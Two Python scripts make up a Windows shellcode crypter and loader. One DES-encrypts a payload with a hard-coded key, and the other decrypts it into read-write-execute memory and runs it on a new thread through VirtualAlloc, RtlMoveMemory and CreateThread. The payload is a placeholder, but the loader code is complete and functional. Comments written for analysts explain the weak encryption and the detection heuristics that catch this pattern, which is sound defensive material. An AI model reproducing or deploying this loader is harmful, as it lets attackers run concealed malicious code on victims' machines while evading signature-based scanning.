# Encryption half of a two-script pair: DES-ECB encrypts a raw payload
# buffer with a hard-coded 8-byte key and prints it base64-encoded for
# embedding in the companion loader script.
# NOTE(review): DES-ECB with a key that ships alongside the ciphertext is
# obfuscation, not confidentiality -- anyone holding the script recovers the
# plaintext. For analysts this means the embedded payload can be recovered
# from the loader directly for inspection and signature extraction.
from Cryptodome.Cipher import DES
import base64

buf = b"shellcode"  # placeholder; the real payload bytes are substituted here
key = b'DEADC0DE'   # hard-coded 8-byte DES key
des = DES.new(key, DES.MODE_ECB)
# Zero-pad up to the 8-byte DES block size. Zero padding is not
# self-describing, so the original length is printed below and the loader
# slices the decrypted buffer back to it.
pad = (8 - len(buf) % 8) * b"\x00"
b64code = base64.b64encode(des.encrypt(buf + pad))
print(b64code)
print(len(buf))
# Loader half of the pair: decodes and DES-ECB-decrypts the blob produced by
# the encryption script, copies it into newly allocated executable memory and
# starts it on a new thread inside the current python.exe process. The
# sequence VirtualAlloc -> RtlMoveMemory -> CreateThread -> WaitForSingleObject
# is the textbook in-process shellcode execution pattern; host-based
# detections key on that API behaviour, not on the DES wrapper.
from Cryptodome.Cipher import DES
import base64
import ctypes

b64code = b"base64code"  # placeholder for the output of the encryption script
length = 510             # original payload length, used to strip the zero padding
key = b"DEADC0DE"        # same hard-coded DES key as the encryption script
des = DES.new(key, DES.MODE_ECB)
buf = des.decrypt(base64.b64decode(b64code))[:length]
shellcode = bytearray(buf)

# ctypes defaults the return type to c_int; a 64-bit restype keeps the full
# address returned by VirtualAlloc.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
# A private, non-image-backed RWX region requested by a scripting host is a
# high-signal indicator for memory scanners and API-telemetry-based EDR.
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
# The thread start address points into the privately allocated region above
# rather than a loaded module's image -- another common detection heuristic.
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
# -1 == INFINITE: the process blocks until the payload thread exits.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))